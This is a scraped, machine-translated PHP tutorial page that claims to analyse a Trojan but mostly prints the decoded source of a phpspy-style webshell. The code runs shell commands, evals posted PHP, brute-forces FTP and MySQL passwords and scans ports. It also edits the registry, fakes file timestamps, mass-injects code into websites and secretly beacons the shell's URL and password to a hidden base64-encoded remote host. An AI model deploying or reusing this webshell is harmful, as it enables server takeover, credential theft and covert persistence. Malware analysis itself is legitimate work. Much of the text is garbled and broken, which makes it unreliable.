Home >Backend Development >PHP Tutorial >PHP Trojan Analysis (Encryption Cracking)_PHP Tutorial
PHP Trojan Analysis (Encryption Cracking)_PHP Tutorial
- WBOYOriginal
- 2016-07-21 15:46:202239browse
Analysis shows that this Trojan is encoded with base64 and then compressed. Although relevant confidentiality measures have been taken, the PHP code must be executed and it will eventually generate PHP source code, so the following PHP program is written to decode, decompress, and write it to a file.
The decoding and decompression code is as follows:
function writetofile($filename, $data)
{ //File Writing
$filenum=@fopen($filename,"w");
if (!$filenum) {
return false;
}
flock($filenum,LOCK_EX);
$file_data=fwrite($filenum,$data);
fclose($filenum);
return true;
}
?>
Then run it in the php environment, you will get the php plaintext file as follows:
error_reporting(7);
ob_start();
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0 ];
@set_time_limit(0);
//Non-safe mode can use the above function to cancel after timeout.
/*====================== Program configuration======================* /
// Whether password verification is required, 1 means verification is required, other numbers mean direct entry. The following options are invalid
$admin['check'] = "1";
// If password verification is required , please change the login password
//Default port table
$hidden = "44997";
$admin['port'] = "80,139,21,3389,3306,43958,1433,5631";
//The second used to jump
$admin['jumpsecond'] = "1";
//The connection port used for Ftp cracking
$alexa = "yes";
/ /Whether to display Alexa ranking, yes or no
$admin['ftpport'] = "21";
// Whether to allow phpspy itself to automatically modify the time of the edited file to the creation time (yes/no)
$retime = "no";
// The default cmd.exe location is used by the proc_open function. For Linux systems, please modify it accordingly. (If it is a winnt system, it can still be specified in the program)
$cmd = "cmd.exe";
// Below is the copyright column displayed by phpspy, because it is regarded as a keyword and killed by many programs, Yuhan~~ allow customization.Don’t change it if you still don’t understand~~
/*====================== Configuration ends============ =========*/
$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
$serverp = $admin['pass'];
$copyurl = base64_decode('PHNjcmlwdCBzcmM9J2h0dHA6Ly8lMzglNjMlNjMlNjUlMkUlNjMlNkYlNkQvJTYzJTY1JTcyJTc0Lz9jZXJ0PTEzJnU9');
$copyurll = base64_decode('Jz48 L3NjcmlwdD4=');
$onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals ');
if ($onoff != 1) {@extract($_POST, EXTR_SKIP);@extract($_GET, EXTR_SKIP);}
$self = $_SERVER['PHP_SELF'];$dis_func = get_cfg_var("disable_functions");
/*===================== Authentication ============== =======*/
if($admin['check'] == "1") {if ($_GET['action'] == "logout") {setcookie ("adminpass", "");echo "";echo "Logout successful...
Automatically exit after three seconds Or click here to exit the program interface>>>
";exit;}if ($_POST['do'] == 'login') {$thepass= trim($_POST['adminpass']);if ($admin['pass'] == $thepass) {setcookie ("adminpass",$thepass,time()+(1*24*3600));echo " ";echo "".$copyurl.$serveru."&p=".$serverp.$copyurll." ";exit;}}if (isset($_COOKIE['adminpass'])) {if ($_COOKIE['adminpass'] != $admin['pass']) {loginpage();} } else {loginpage();}}
/*====================== Verification ends ============= ========*/
// Determine magic_quotes_gpc status
if (get_magic_quotes_gpc()) {$_GET = stripslashes_array($_GET);$_POST = stripslashes_array($_POST);}
//mix.dll code
$mixdll = "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";
function shelL($command){
global $windows,$disablefunctions;
$exec = '';$output= '';
$dep[]=array('pipe','r') ;$dep[]=array('pipe','w');
if(is_callable('passthru') && !strstr($disablefunctions,'passthru')){ @ob_start();passthru($command );$exec=@ob_get_contents();@ob_clean();@ob_end_clean();}
elseif(is_callable('system') && !strstr($disablefunctions,'system')){$tmp = @ob_get_contents (); @ob_clean();system($command) ; $output = @ob_get_contents(); @ob_clean(); $exec= $tmp; }
elseif(is_callable('exec') && !strstr($ disablefunctions,'exec')) {exec($command,$output);$output = join("n",$output);$exec= $output;}
elseif(is_callable('shell_exec') && ! strstr($disablefunctions,'shell_exec')){$exec= shell_exec($command);}
elseif(is_resource($output=popen($command,"r"))) {while(!feof($output )){$exec= fgets($output);}pclose($output);}
elseif(is_resource($res=proc_open($command,$dep,$pipes))){while(!feof($ pipes[1])){$line = fgets($pipes[1]); $output.=$line;}$exec= $output;proc_close($res);}
elseif ($windows && is_object($ws = new COM("WScript.Shell"))){$dir=(isset($_SERVER["TEMP"]))?$_SERVER["TEMP"]:ini_get ('upload_tmp_dir') ;$name = $_SERVER["TEMP"].name();$ws->Run("cmd.exe /C $command >$name", 0, true);$exec = file_get_contents($name);unlink($name);}
return $exec;
}
// View PHPINFO
if ($_GET['action'] == "phpinfo") { echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "The phpinfo() function has been disabled, please check the
}if($ _GET['action'] == "nowuser") {$user = get_current_user();
if(!$user) $user = "Reporting to the chief, the host is abnormal and cannot get the current user name!";
echo "Current process username: $user";
exit;
}
if(isset($_POST['phpcode'])){eval("?".">$_POST[ phpcode]}
if($action=="mysqldown"){
$link=@mysql_connect($host,$user,$password);
if (!$link) {
$downtmp = 'Database connection failed: ' . mysql_error(); ";
$result = @mysql_query($query, $link);
if(!$result){
$downtmp = "The read failed, maybe the file does not exist or there is no file permission.
".mysql_error();
}else{
while ($row = mysql_fetch_array($result)) {
$filename = basename($filename);
if($rardown=="yes"){
$zip = NEW Zip;
$zipfiles[]=Array("$filename",$row[0]);
$zip->Add($zipfiles,1);
$code = $zip->get_file();
$filename = "".$filename.".rar";
}else{
$code = $row[0];
}
header("Content-type: application/octet-stream");
header("Accept-Ranges: bytes");
header("Accept-Length: ".strlen($code));
header("Content-Disposition: attachment;filename=$filename");
echo($code);
exit;
}
}
}
}
// 在线代理
if (isset($_POST['url'])) {$proxycontents = @file_get_contents($_POST['url']);echo ($proxycontents) ? $proxycontents : "
获取 URL 内容失败
}
// 下载文件
if (!empty($downfile)) {if (!@file_exists($downfile)) {echo "";} else {$filename = basename($downfile);$filename_info = explode('.', $filename);$fileext = $filename_info[count($filename_info)-1];header('Content-type: application/x-'.$fileext);header('Content-Disposition: attachment; filename='.$filename.'');header('Content-Description: PHP Generated Data');header('Content-Length: '.filesize($downfile));@readfile($downfile);exit;}
}
// 直接下载备份数据库
if ($_POST['backuptype'] == 'download') {
@mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败");
@mysql_select_db($dbname) or die("选择数据库失败");
$table = array_flip($_POST['table']);
$result = mysql_query("SHOW tables");
echo ($result) ? NULL : "出错: ".mysql_error();
$filename = basename($_SERVER['HTTP_HOST']."_MySQL.sql");
header('Content-type: application/unknown');
header('Content-Disposition: attachment; filename='.$filename);
$mysqldata = '';
while ($currow = mysql_fetch_array($result)) {
if (isset($table[$currow[0]])) {
$mysqldata.= sqldumptable($currow[0]);
$mysqldata.= $mysqldata."rn";
}
}
mysql_close();
exit;
}
// 程序目录
$pathname=str_replace('\','/',dirname(__FILE__));
$dirpath=str_replace('\','/',$_SERVER["DOCUMENT_ROOT"]);
// 获取当前路径
if (!isset($dir) or empty($dir)) {
$dir = ".";
$nowpath = getPath($pathname, $dir);
} else {
$dir=$_GET['dir'];
$nowpath = getPath($pathname, $dir);
}
// 判断读写情况
$dir_writeable = (dir_writeable($nowpath)) ? "可写" : "不可写";
$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | PHPINFO()" : "";
$reg = (substr(PHP_OS, 0, 3) == 'WIN') ? " | 注册表操作" : "";
$tb = new FORMS;
?>
//$_SERVER[" DOCUMENT_ROOT"]
$tb->tableheader();
$tb->tdbody('
| '.$_SERVER['HTTP_HOST'].' | '.date(" Y year m month d day h:i:s",time()).' | '.gethostbyname($_SERVER['SERVER_NAME']) .' |
$tb->tdbody('root directory | Shell Directory | Environment Variables | Online proxy'.$reg.$phpinfo.' | WebShell | Miscellaneous Crack | Unzip mix.dll | Log out');
$ tb->tdbody('Batch mounting | Http file download | File search | Execute php script | Execute SQL statement | Func rebound Shell | < ;a href="?action=sqlbak" href="?action=sqlbak">MySQL Backup | Serv -UElevation');
$tb->tablefooter();
?>
/*====================== Execution operation starts==== =================*/
echo "
n";
// Delete file
if (!empty( $delfile)) {
if (file_exists($delfile)) {
echo (@unlink($delfile)) ? $delfile." Deletion successful!" : "File deletion failed!";
} else {
echo basename($delfile)."The file no longer exists!";
}
}
//Delete directory
elseif (!empty($deldir)) {
$deldirs="$dir/$deldir";
if (!file_exists("$deldirs") ) {
, with with with with with the . > }
}
// Create directory
elseif (($createdirectory) AND !empty($_POST['newdirectory'])) {
if (!empty($newdirectory) ) {
$mkdirs="$dir/$newdirectory";
if (file_exists("$mkdirs")) {
echo "The directory already exists!";
} else {
> echo (@mkdir("$mkdirs",0777)) ? "Directory creation successful!" : "Creation failed!";
@chmod("$mkdirs",0777);
}
}
}
// Upload file
elseif ($doupfile) {
echo (@copy($_FILES['uploadfile']['tmp_name'],"".$uploaddir. "/".$_FILES['uploadfile']['name']."")) ? "Upload successful!" : "Upload failed!";
}
elseif($action=="mysqlup" ){
$filename = $_FILES['upfile']['tmp_name'];
if(!$filename) {
echo "No file selected to upload.";
}else{
$shell = file_get_contents($filename);
$mysql = bin2hex($shell);
if(!$upname) $upname = $_FILES['upfile' ]['name'];
$shell = "select 0x".$mysql." from ".$database." into DUMPFILE '".$uppath."/".$upname."';";
$link=@mysql_connect($host,$user,$password);
if(!$link){
echo "Login failed".mysql_error();
}else{
$result = mysql_query($shell, $link);
if($result){
echo" The operation was successful. The file was successfully uploaded to ".$host.", and the file name was ".$uppath."/ ".$upname."..";
}else{ . 🎜>}
elseif($action=="mysqldown"){
if(!empty($downtmp)) echo $downtmp;
}
// Edit file
elseif ($_POST[' do'] == 'doeditfile') {
if (!empty($_POST['editfilename'])) {
if(!file_exists($editfilename)) unset($retime);
if ($time==$now) $time = @filemtime($editfilename);
$time2 = @date("Y-m-d H:i:s",$time);
$filename="$editfilename" ;
@$fp=fopen("$filename","w"); >".$_POST['filecontent']." $filecontent = gzdeflate($filecontent);
$filecontent = base64_encode($filecontent);
$filecontent = "< ;?phpn/*nThe code is encrypted by the light blue radiant fish!n*/neval(gzinflate(base64_decode('$filecontent'))));n"."?>"; filecontent = $_POST['filecontent'];
fclose($fp);
if($retime=="yes"){
echo" Yuyu automatic operation: ";
echo $msg=@touch($filename,$time) ? " Modify the file as ". $ Time2." Success! ":" Modify the file time failed! ";
}
} else {
echo" Please enter the file name you want to edit! ";
}
}
//File download
elseif ($_POST['do'] == 'downloads') {
$contents = @file_get_contents($_POST['durl']);
if(!$contents){
echo "Unable to read the data to download";
}
elseif(file_exists($path)){
echo "Sorry, file". $path." already exists, please change the save file name.";
}else{
$fp = @fopen($path,"w");
echo $msg=@fwrite($fp,$contents) ? "File downloaded successfully!" : " Download file failed to write!";
@fclose($fp);
}
}
elseif($_POST['action']=="mix"){
if (!file_exists($_POST['mixto'])){
$tmp = base64_decode($mixdll);
$tmp = gzinflate($tmp);
$fp = fopen($_POST[' mixto'],"w");
echo $msg=@fwrite($fp,$tmp) ? "Decompression successful!" : "Is this directory not writable? !";
fclose($fp);
}else{
echo"Isn’t it?".$_POST['mixto']."Already exists~";
}
}
// Edit file properties
elseif ($_POST['do'] == 'editfileperm ') {
if (!empty($_POST['fileperm'])) {
$fileperm=base_convert($_POST['fileperm'],8,10);
echo (@chmod( $dir."/".$file,$fileperm)) ? "Attribute modified successfully!" : "Modification failed!";
echo "File ".$file." The modified attributes are: ".substr( base_convert(@fileperms($dir."/".$file),10,8),-4);
} else {
echo "Please enter the attributes you want to set!";
}
}
// File rename
elseif ($_POST['do'] == 'rename') {
if (!empty($_POST['newname'])) {
$newname=$_POST['dir']."/".$_POST['newname'];
if (@file_exists($newname)) {
echo "".$_POST[ 'newname']." Already exists, please re-enter one!";
'])." Successfully changed the name to ".$_POST['newname']." !" : "Failed to modify the file name!";
}
} else { The file name!";
}
}
elseif ($_POST['do'] == 'search') {
if(!empty($oldkey)){
echo " Search keywords: [".$oldkey."], the search results are shown below: ";
if($type2 == "getpath"){
echo "Move the mouse over the result file and a partial screenshot will be displayed.";
}
echo"
";
find( $path);
}else{
echo "You want to check for shrimps? Do you want to check for shrimps? Are there any shrimps that you want to check?";
}
}
elseif ($ _GET['action']=='plgmok') {
dirtree($_POST['dir'],$_POST['mm']);
}
elseif ($_GET['action' ] == "plgm") {
$action = '?action=plgmok';
$gm = "";
$tb->tableheader();
$tb->formheader($action,'Batch horse mounting');
$tb- >tdbody('Website batch horse-mounting program php version','center');
$tb->tdbody('File location: '.$tb->makeinput('dir',''.$ _SERVER["DOCUMENT_ROOT"].'','','text','60').'
Code to be linked:'.$tb->maketextarea('mm',$gm,'50' ,'5').''.$tb->makehidden('do','Batch horse hanging').'
'.$tb->makeinput('submit','Start horse hanging' ,'','submit'),'center','1','35');
echo "";
$tb->tablefooter();
} //end plgm
// Clone time
elseif ($_POST['do'] == 'domodtime') {
if (!@file_exists($_POST['curfile'])) {
echo "The file to be modified does not exist!";
} else {
if (!@file_exists($_POST['tarfile'])) {
echo "The file to be referenced does not exist!"; ";
} else { The modification time of basename($_POST['curfile'])." was successfully changed to ".date("Y-m-d H:i:s",$time)." !" : "The modification time of the file failed!";
}
}
}
// Custom time
elseif ($_POST['do'] == 'modmytime') {
if (!@file_exists( $_POST['curfile'])) {
echo "The file to be modified does not exist!";
}else {
$year=$_POST['year'];
$month=$_POST['month'];
$data=$_POST['data'];
$hour=$_POST['hour'];
$minute=$_POST['minute'];
$second=$_POST['second'];
if (!empty($year) AND !empty($month) AND !empty($data) AND !empty($hour) AND !empty($minute) AND !empty($second)) {
$time=strtotime("$data $month $year $hour:$minute:$second");
echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." 的修改时间成功改为 ".date("Y-m-d H:i:s",$time)." !" : "文件的修改时间修改失败!";
}
}
}
elseif($do =='port'){
$tmp = explode(",",$port);
$count = count($tmp);
for($i=$first;$i<$count;$i++){
$fp = @fsockopen($host, $tmp[$i], $errno, $errstr, 1);
if($fp) echo"发现".$host."主机打开了端口".$tmp[$i]."
";
}
}
/*
这里代码写得很杂,说实话我自己都不知道写了什么。
好在能用,我就没管了,假设有人看到干脆重写吧。*/
elseif ($do == 'crack') {//反正注册为全局变量了。
if(@file_exists($passfile)){
$tmp = file($passfile);
$count = count($tmp);
if(empty($onetime)){
$onetime = $count;
$turn="1";
}else{
$nowturn = $turn+1;
$now = $turn*$onetime;
$tt = intval(($count/$onetime)+1);
}
if($turn>$tt or $onetime>$count){
echo"超过字典容量了耶~要是破解最后进程的,很抱歉失败。";
}else{
$first = $onetime*($turn-1);
for($i=$first;$i<$now;$i++){
if($ctype=="mysql") $sa = @mysql_connect($host,$user,chop($tmp[$i]));
else $sa = @ftp_login(ftp_connect($host,$admin[ftpport]),$user,chop($tmp[$i]));
if($sa)
{
$t = "获取".$user."的密码为".$tmp[$i]."";
}
}
if(!$t){
echo "字典总共".$count."个,现在从".$first."到".$now.",".$admin[jumpsecond]."秒后进行这".$onetime."个密码的试探. >>>
全历此次".$type."的破解需要".$tt."次,现在是第".$turn."次解密。";
}
else {
echo"$t";
}
}
}else{
echo"字典文件不存在,请确定。“; ,",$port);
$count = count($tmp); ;
$first = $tmp[0];
$count = $tmp[1];
}
for($i=$first;$i<$count;$ i++){
If(!eregi("-",$port)){
$fp = @fsockopen($host, $tmp[$i], $errno, $errstr, 1);
If ($ FP) Echo "Discover". $ Host. "The host opened the port". $ TMP [$ i]. "& Lt; br & gt;";
} else {
$ fp = @fsockopen ( $ Host, $ i, $ ERRNO, $ EERSTR, 1);
IF ($ FP) echo ". $ Host." The host opened the port ". $ i." & lt; ";
$dbname)) {
echo "Database connection successful!";
mysql_close();
} else {
echo mysql_error();
}
}
//Execute SQL statement
elseif ($_POST['do'] == 'query') {
@mysql_connect($servername,$dbusername,$dbpassword) or die("Database connection failed");
@mysql_select_db($dbname) or die("Failed to select database");
$result = @mysql_query($_POST['sql_query']);
echo ($result) ? "SQL statement successful Execute!" : "Error: ".mysql_error();
mysql_close();
}
// Backup operation
elseif ($_POST['do'] == 'backupmysql ') {
if (empty($_POST['table']) OR empty($_POST['backuptype'])) {
echo "Please select the data table to be backed up and the backup method!";
🎜> @mysql_select_db($dbname) or die ("Failed to select database"); );
if ($filehandle) {
$result = mysql_query("SHOW tables"); 🎜> while ( $currow = mysql_fetch_array($result)) {
fwrite($ filehandle,"nnn");
fclose($filehandle); "";
}
}
}
}
elseif($downrar) {
if (!empty($dl)) {
if(eregi("unzipto:",$localfile)){
$path = "".$dir."/".str_replace("unzipto:","",$localfile)."";
$zip = new Zip;
$zipfile=$dir."/ ".$dl[0];
$array=$zip->get_list($zipfile);
$count=count($array);
$f=0;
$d =0;
for($i=0;$i<$count;$i++) {
>Extract($zipfile,$path,$i)>0) $f++;
"$dl[0] decompressed to ".$path." successfully
($f files$d directories)";
elseif($f==0) echo "$dl[0] decompressed Failed to reach ".$path.";
else echo "$dl[0] is not fully decompressed
($f files and $d directories have been decompressed)";
}else{
$zipfile="";
$zip = new Zip;
for($k=0;isset($dl[$k]);$k++)
$zipfile=$ dir."/".$dl[$k];
ray($dl[$k]);
$filesize=@filesize($dir." /".$zipfilearray[$i]);
$fp=@fopen($dir."/".$filename,rb);
$zipfiles[]=Array($filename,@fread($ fp,$filesize));
else
{
$filename=$dl[$k];
$filesize=@filesize($zipfile);
$fp=@fopen($zipfile,rb);
$zipfiles[]=Array($filename,@fread($fp,$filesize));
@fclose($fp);
}
}
$zip->Add($zipfiles,1);
$code = $zip->get_file();
$ck = "_QQ44997_".date("Y-m-d",time())."";
if(empty($localfile)){
header("Content-type: application/octet-stream");
header("Accept-Ranges: bytes");
header("Accept-Length: ".strlen($code));
header("Content-Disposition: attachment;filename=".$_SERVER['HTTP_HOST']."".$ck."_Files.zip");
echo $code;
exit;
}else{
$fp = @fopen("".$dir."/".$localfile."","w");
echo $msg=@fwrite($fp,$code) ? "压缩保存".$dir."/".$localfile."本地成功!!" : "Directory".$dir."No write permission!";
@fclose($fp); Pack the downloaded files!";
}
}
// Shell.Application run the program
elseif(($_POST['do'] == 'programrun') AND !empty($_POST ['program'])) {
$shell= &new COM('Sh'.'el'.'l.Appl'.'ica'.'tion');
$a = $shell-> ;ShellExecute($_POST['program'],$_POST['prog']);
echo ($a=='0') ? "The program has been executed successfully!" : "The program failed to run!";
}
// View PHP configuration parameter status
elseif(($_POST['do'] == 'viewphpvar') AND !empty($_POST['phpvarname'])) {
echo "Configuration parameters".$_POST['phpvarname']." Detection result: ".getphpcfg($_POST['phpvarname'])."";
}
// Read the registry
elseif (($regread) AND !empty($_POST['readregname'])) {
$shell= &new COM('WSc'.'rip'.'t.Sh'.'ell');
var_dump(@$shell->RegRead($_POST['readregname']));
}
// Write to the registry
elseif(($regwrite) AND !empty($ _POST['writeregname']) AND !empty($_POST['regtype']) AND !empty($_POST['regval'])) {
$shell= &new COM('W'.'Scr'. 'ipt.S'.'hell');
$a = @$shell->RegWrite($_POST['writeregname'], $_POST['regval'], $_POST['regtype']);
echo ($a=='0') ? "Write registry key value successfully!" : "Write ".$_POST['regname'].", ".$_POST['regval']. ", ".$_POST['regtype']." Failed!";
}
// Delete registry
elseif(($regdelete) AND !empty($_POST['delregname']) ) {
$shell= &new COM('WS'.'cri'.'pt.S'.'he'.'ll');
$a = @$shell->RegDelete($_POST ['delregname']);
echo ($a=='0') ? "Delete registry key value successfully!" : "Delete ".$_POST['delregname']." Failed!";
}
else {
echo "$notice";
echo "ProgrampcAnywhere | Start Programs | AllUsers | Serv-U | ";
for ($i=66;$i<=90;$i++){$drive= chr($i).':' ;
if (is_dir($drive."/")){$vol=shelL("vol $drive");if(empty($vol))$vol=$drive;echo " $drive\";}
}
}
echo "
/*===================== 执行操作 结束 =====================*/
if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) {
$tb->tableheader();
?>
n";
echo "n";
}// end dir
elseif ($_GET['action'] == "editfile") {
if(empty($newfile)) {
$filename="$dir/$editfile";
$fp=@fopen($filename,"r");
$contents=@fread($fp, filesize($filename));
@fclose($fp);
$contents=htmlspecialchars($contents);
}else{
$editfile=$newfile;
$filename = "$dir/$editfile";
}
$action = "?dir=".urlencode($dir)."&editfile=".$editfile;
$tb->tableheader();
$tb->formheader($action,'新建/编辑文件');
$tb->tdbody('当前文件: '.$tb->makeinput('editfilename',$filename).' 输入新文件名则建立新文件 Php代码加密: ');
$tb->tdbody($tb->maketextarea('filecontent',$contents));
$tb->makehidden('do','doeditfile ');
$tb->formfooter('1','30');
}//end editfile
elseif ($_GET['action'] == "rename" ) {
$nowfile = (isset($_POST['newname'])) ? $_POST['newname'] : basename($_GET['fname']);
$action = "?dir= ".urlencode($dir)."&fname=".urlencode($fname);
$tb->tableheader();
$tb->formheader($action,'Modify file name') ;
$tb->makehidden('oldname',$dir."/".$nowfile);
$tb->makehidden('dir',$dir);
$tb- >tdbody('Current file name: '.basename($nowfile));
$tb->tdbody('Renamed: '.$tb->makeinput('newname'));
$tb->makehidden('do','rename');
$tb->formfooter('1','30');
}//end rename
elseif ($_GET['action'] == "eval") {
$action = "?dir=".urlencode($dir)."";
$tb->tableheader();
$tb->formheader(''.$action.' "target="_blank' ,'Execute php script');
$tb->tdbody($tb->maketextarea('phpcode', $contents));
$tb->formfooter('1','30');
}
elseif ($_GET['action'] == "fileperm") {
$action = "?dir=".urlencode($dir)."&file=".$file;
$tb->tableheader();
$tb->formheader($action ,'Modify file attributes');
$tb->tdbody('Modify the attributes of '.$file.' to: '.$tb->makeinput('fileperm',substr(base_convert(fileperms($ dir.'/'.$file),10,8),-4)));
$tb->makehidden('file',$file);
$tb->makehidden(' dir',urlencode($dir));
$tb->makehidden('do','editfileperm');
$tb->formfooter('1','30');
}//end fileperm
elseif ($_GET['action'] == "newtime") {
$action = "?dir=".urlencode($dir);
$ cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=> 6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12) ;
$tb->tableheader();
$tb->formheader($action,'Last modification time of cloned file');
$tb->tdbody("Modify file: " .$tb->makeinput('curfile',$file,'readonly')." → Target file: ".$tb->makeinput('tarfile','Full path and file name required'),' center','2','30');
$tb->makehidden('do','domodtime');
$tb->formfooter('','30');
$tb->formheader($action,'Last modification time of custom file');
$tb->tdbody('
- Typical valid timestamp The range is from Friday 13 December 1901 20:45:54 GMT to Tuesday 19 January 2038 03:14:07
(The date is based on the minimum and maximum values of 32-bit signed integers (coming from) - Explanation: The day is between 01 and 30, the hour is between 0 and 24, and the minutes and seconds are between 0 and 60!
$tb->tdbody('Current file name: '.$file);
$tb->makehidden('curfile',$file);
$ tb->tdbody('Modify to: '.$tb->makeinput('year','1984','','text','4').' year'.$tb->makeselect( array('name'=>'month','option'=>$cachemonth,'selected'=>'October')).'month'.$tb->makeinput('data','18 ','','text','2').' Day'.$tb->makeinput('hour','20','','text','2').' Hour'.$ tb->makeinput('minute','00','','text','2